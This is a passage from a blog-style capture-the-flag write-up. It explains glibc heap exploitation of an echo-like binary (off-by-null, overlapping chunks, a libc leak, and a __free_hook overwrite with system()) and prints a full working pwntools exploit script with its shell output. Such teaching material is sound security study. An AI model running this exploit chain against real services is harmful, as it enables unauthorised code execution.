data += p64(0xaaaaaaaaaaaaaaaa) # prev_size <----+
data += p64(0x21)               # size           |
data += p64(heap + 0xe10)       # ---------------+
data += p64(heap + 0xe10)
data += p64(0x20) # Next's prev size
data += b'\0'     # Off by null into next's size
create_chunk(0x30, data)

Now only remains how to allocate and free the 0x120 chunk without overwriting what we’ve put in it. By writing enough to reach in the stack buffer the nullbyte we placed there when we allocated the 0x30 chunk we would only overwrite the first 0x28 bytes (notice that behind this nullbyte a string of size 0x118 continues), with the fake chunk safe at offset 0xf0.

log.info("Allocating 0x120 (moving to unsorted)")
# Reach the nullbyte placed when allocating 0x30
r.write(b"A" * (0x30 - 8 + 1)); sleep(deltat)

And, sure enough, with gef we can see that everything behaved seamlessly, the program keeps running and we have our baby in the unsorted bin:

[+] unsorted_bins[0]: fw=0x555555604e10, bk=0x555555604e10
 →   Chunk(addr=0x555555604e20, size=0x120, flags=PREV_INUSE)
[+] Found 1 chunks in unsorted bin.

Which also means that it contains a couple of pointers to the libc:

0x555555604e20: 0x00007ffff7bebca0  0x00007ffff7bebca0

Check this out, the chunk is still of size 0x120 even though we changed its size to 0x100, this is because this isn’t really our chunk, this is the fake previous one (0x20) merged with ours (now 0x100). 3

Shall we just r.write(b'A')?

Huh, nope, I doesn’t work, let’s see why. If I place a breakpoint at the call to malloc() I can see it is in fact returning our chunk but…

$rax   : 0x0000555555604e20  →  0x0000000000000000

what the actual fuck? Why is there a NULL pointer? Where did my pointer go? Ok, let me calm down, we will try to understand it later, for now I just realized that it is only the fwd pointer, the bck pointer is still there, which means we only need to step over the dead body of the first pointer, simple enough.

log.info("Allocating 0x120 (leaking)")
r.clean()
r.write(b"A" * 8); sleep(deltat)
libc = int.from_bytes(r.read()[-6:], "little") - 0x3ebca0
log.info("Libc : 0x%x" % libc)

Great, we got a sweet libc address. We got this!

Where did my pointer go? (or a deeper understanding of malloc()’s nonsenseness)

And I also found the reason why our pointer gets lost in the darkness: malloc() when iterating over the unsorted bin

    if (size == nb)
    {
        set_inuse_bit_at_offset (victim, size);
        if (av != &main_arena)
            set_non_main_arena (victim);
#if USE_TCACHE
        /* Fill cache first, return to user only if cache fills.
        We may return one of these chunks later.  */
        if (tcache_nb
            && tcache->counts[tc_idx] < mp_.tcache_count)
        {
            tcache_put (victim, tc_idx);
            return_cached = 1;
            continue;
        }
        // [...]

prioritizes filling the tcache, and only when there’s no other option it returns one of the chunks it placed in the tcache. So, before getting to us, our chunk makes a little trip to the tcache bin for 0x120 (like going to jail in monopoly with a “Get Out of Jail Free” card), where it is the only chunk, thus the NULL pointer placed in its fwd pointer.

So right now what we got to do is choose where are we going to write, what are we going to write and, more importantly, how.

Overlapping is the best love language (or how to get inside her headers)

Ok, please, don’t laugh at me, but at the moment I lived the realization of the overlapped chunk we just created, by accident really, as something profound, now I know it is the standard technique in this sort of scenarios. Anyway, I think it is kind of beautiful to just reinvent the wheel or rediscover the Mediterranean, I’m certainly having a shitload of fun while learning a lot, I hope the reader isn’t putting their hands on their head too much and that they can enjoy with me my inexperience in the field of heap exploitation.

In any case, this is such an ineffable serendipity! I was just trying to leak a libc address, and I ended up finding a way to write wherever I want. If there was another method to leak a libc address and I had used it, maybe it would have never occurred to me the overlapping chunks technique, and I would have never solved this challenge.

Back on track. As I just said, we have created, by accident, two overlapping chunks, so we can corrupt all our chunk’s metadata from the other, that means we can make our chunk have as next chunk in the linked list whatever we want by writing in the 0x30 chunk. Something like this ought to work:

log.info("Allocating 0x30 (exploit overlapping chunks)")
data  = b''
data += b"A" * 0x8 # Reach fake chunk's fd pointer within 0x30 chunk
# Change its size to anything other than 0x120 to prevent it from
# going back to the 0x120 bin
data += p64(0x130)
data += p64(libc) # Pointer to _whatever_ we want
create_chunk(0x30, data)

log.info("Allocating 0x120 twice")
# First remove _our_ chunk from the list and place it in the 0x130 list
r.write(b"A" * (0x120 - 8))
# This malloc() will return a pointer to the libc
r.write(b"A" * (0x120 - 8))

As expected, we can make malloc() return whatever address we want:

$rax   : 0x00007ffff7800000  →  0x03010102464c457f

But we need to write to some place useful. To my mind came two options, atexit and __free/malloc_hook. __malloc_hook can be discarded immediately because in order to pass an address as an argument we would need to send a massive string to the program, which would be a problem in on itself, but we are also limited to strings of 512. atexit I’m pretty sure is a viable option, but __free_hook on the other hand seems just too easy compared to having to study the atexit structures and all that, also it has the problem that the program has to live long enough to exit(), and I’m not sure whether it’s gonna make it with the heap in this condition (just like me and my liver).

Let’s prove we can gain control of the RIP register really easy

log.info("Allocating 0x30 (exploit overlapping chunks)")
data  = b''
data += b"A" * 0x8 # Reach fake chunk's fwd pointer within 0x30 chunk
# Change its size to anything other than 0x120 to prevent it from
# going back to the 0x120 bin
data += p64(0x130)
data += p64(libc + 0x3ed8e8) # Pointer to __free_hook as next entry in list
create_chunk(0x30, data)

log.info("Allocating 0x120 twice, overwriting __free_hook and triggering it")
# First remove _our_ chunk from the list and place it in the 0x130 list,
# then allocate a pointer to __free_hook and overwrite it with an arbitrary ptr
create_chunk(0x120, p64(0x6c6c6f726b636972))

In gdb:

$rax   : 0x6c6c6f726b636972 ("rickroll"?)
$rdi   : 0x00007ffff7bed8e8  →  "rickroll"

 → 0x7ffff7897c25 <free+725>       call   rax

It’s past my bedtime (or it’s time to finally put it all together)

The reason why the __free_hook way is so easy is because when the program calls to free() (and through it to the address we place in its hook) it is already passing as argument an address to something we control (the motherfucking chunk to which we just wrote). So if we were to place in __free_hook… I don’t know, system() for example, while writing at the beginning of our chunk something like /bin/sh, we may win a shell. Now, we can’t place a null terminator for this string, but ; will do the job just fine.

from pwn import *

r = process("./binary")
deltat = .05

def create_chunk(size, contents = None):
    # Fill buffer with a string with desired size for strlen()
    r.write(b"X" * (size - 0x8) + b'\0'); sleep(deltat)
    if(contents is None): return

    idx = None
    previdx = None
    while (idx := contents.rfind(b'\0', 0, idx)) != -1:
        # Write what goes between the null we are considering now, and the
        # one we considered the last iteration
        if len(contents[idx + 1:previdx]) != 0:
            r.write(b"Y" * (idx + 1) + contents[idx + 1:previdx]); sleep(deltat)
        # Place the null where it belongs
        r.write(b"Z" * (idx - 1) + b'\n'); sleep(deltat)
        previdx = idx
    r.write(contents[:previdx]); sleep(deltat)

### Fill tcache bin for 0x100 ###
log.info("Filling tcache bin 0x100")
log.info("Allocating 0x100") # First one is for free
create_chunk(0x100)
for i in range(6):
    log.info("Allocating 0x%03x" % (0x1f0 - (i * 0x10)))
    create_chunk(0x1f0 - (i * 0x10))
log.info("Allocating 0x100 (overflowing)")
r.write(b"A" * (0x100 - 9) + b'\n' + b'\0'); sleep(deltat)
for i in range(5):
    log.info("Allocating 0x%03x (overflowing)" % (0x1f0 - (i * 0x10)))
    r.write(b"A" * (0x1f0 - (i * 0x10) - 9) + b'\n' + b'\0'); sleep(deltat)
# Last one doesn't need to be overflowed
log.info("Allocating 0x1a0")
create_chunk(0x1a0); sleep(deltat)

### Leak heap ###
r.clean()
log.info("Allocating 0x100 (leaking)")
create_chunk(0x100, b"A")
heap = int.from_bytes(r.read()[-6:], "little") - 0xa41
log.info("Heap : 0x%06x" % heap)

### Insert a chunk in unsorted ###
log.info("Allocating 0x30")
create_chunk(0x30)
log.info("Allocating 0x120")
data  = b''
data += b"A" * (0x100 - 0x10)
data += p64(0xaaaaaaaaaaaaaaaa) # prev_size
data += p64(0x21)               # size
data += b"A" * 0x10
create_chunk(0x120, data)

log.info("Allocating 0x30 (overflowing)")
data  = b''
data += p64(0xaaaaaaaaaaaaaaaa) # prev_size <----+
data += p64(0x21)               # size           |
data += p64(heap + 0xe10)       # ---------------+
data += p64(heap + 0xe10)
data += p64(0x20) # Next's prev size
data += b'\0'     # Off by null into next's size
create_chunk(0x30, data)

log.info("Allocating 0x120 (moving to unsorted)")
# Reach the nullbyte placed when allocating 0x30
r.write(b"A" * (0x30 - 8 + 1)); sleep(deltat)

log.info("Allocating 0x120 (leaking)")
r.clean()
r.write(b"A" * 8); sleep(deltat)
libc = int.from_bytes(r.read()[-6:], "little") - 0x3ebca0
log.info("Libc : 0x%x" % libc)
system = libc + 0x4f440

log.info("Allocating 0x30 (exploit overlapping chunks)")
data  = b''
data += b"A" * 0x8 # Reach fake chunk's fd pointer within 0x30 chunk
# Change its size to anything other than 0x120 to prevent it from
# going back to the 0x120 bin
data += p64(0x130)
data += p64(libc + 0x3ed8e0) # Pointer to __free_hook - 8 as next entry in list
create_chunk(0x30, data)

log.info("Allocating 0x120 twice, overwriting __free_hook and triggering it")
# Will first remove chunk from list and then allocate a pointer to __free_hook-8
create_chunk(0x120, b"/bin/sh;" + p64(system)[:6])

r.clean()
r.interactive()
❯ python a.py
[+] Starting local process './echo': pid 40397
[*] Filling tcache bin 0x100
[*] Allocating 0x100
[*] Allocating 0x1f0
[*] Allocating 0x1e0
[*] Allocating 0x1d0
[*] Allocating 0x1c0
[*] Allocating 0x1b0
[*] Allocating 0x1a0
[*] Allocating 0x100 (overflowing)
[*] Allocating 0x1f0 (overflowing)
[*] Allocating 0x1e0 (overflowing)
[*] Allocating 0x1d0 (overflowing)
[*] Allocating 0x1c0 (overflowing)
[*] Allocating 0x1b0 (overflowing)
[*] Allocating 0x1a0
[*] Allocating 0x100 (leaking)
[*] Heap : 0x5593f03dc000
[*] Allocating 0x30
[*] Allocating 0x120
[*] Allocating 0x30 (overflowing)
[*] Allocating 0x120 (moving to unsorted)
[*] Allocating 0x120 (leaking)
[*] Libc : 0x7fdbcd400000
[*] Allocating 0x30 (exploit overlapping chunks)
[*] Allocating 0x120 twice, overwriting __free_hook and triggering it
[*] Switching to interactive mode
$ whoami
arget
$ pwd
/home/arget
$ 

And we have shell! Remember to adjust deltat, you may need to increase it, especially when attacking a remote target.

An annoying echo

You know what? Fuck it, I don’t want a shell. After overwriting __free_hook, any string we send to the program will be passed to system() when its chunk gets freed, so we would be able to run commands through our little program. This way we don’t even need to introduce “/bin/sh;”. This also means that the first free() after we overwrite its hook will be a call to system(&&system), and so we would first get an ugly sh: line 1: $'@\364\204\367\377\177': command not found, but after that everything will work without problem, we would be able to execute any command (as long as its length is constrained to 512 bytes).

data += p64(libc + 0x3ed8e8) # Pointer to __free_hook as next entry in list
create_chunk(0x30, data)

log.info("Allocating 0x120 twice, overwriting __free_hook and triggering it")
# Will first remove chunk from list and then allocate a pointer to __free_hook
create_chunk(0x120, p64(system)[:6])

r.clean()
r.interactive()
$ pwd
pwd
/home/arget
$ whoami
whoami
arget
$ 

A perfect shell. Just with an annoying echo.

Signing off (or TL;DR)

I’d like to highlight a couple of keypoints aiming to hindsight the long journey that took us here.

I also want to thank the creator of this amazing challenge. I spent four days completely absorbed by it, had tons of fun and learnt much more. I guess not all (c)heap challenges are just Rubik’s cubes. It also gave me something to do on new year’s eve, which was writing this document.

Finally I want to thank you too, if someone somehow managed to read() this far I do appreciate it very much and makes the effort of writing all this really worth it.

Happy new year from Madrid.
Y.

Ah Bartleby! Ah humanity!

— Melville, Bartleby, the Scrivener.

Notes

1 Notice that in fact this is preventing our chunk from being consolidated with the top chunk (which is the actual next one) and getting converted into the new top chunk (which would mean it wouldn’t go to any bin).

2 I’m setting the PREV_INUSE bit in the fake chunk size field because that’s what would make more sense from the free() perspective (“this chunk is free, so the previous one can’t be free or they would’ve been merged already”), but that bit is never checked so it really doesn’t have to be set.

3 Well, technically it isn’t a coincidence, we engineered our chunk with a size 0x100 + MINSIZE because we wanted to make the fake next chunk as small as possible, i. e. MINSIZE, and it had to be at offset 0x100 and at the end of the chunk. When we changed its size to 0x100 we effectively shortened it by MINSIZE, and when it got merged with the fake previous one, which we also made of the smallest size possible, we increased the size precisely by MINSIZE. Only in the case where the fake chunks’ sizes differ we would end up with a resulting chunk with a different size.
It is interesting to consider also what would have happened if the resulting chunk were of a different size. I mean, we already have the stack buffer filled with a string of size 0x118, ready to allocate a chunk of size 0x120.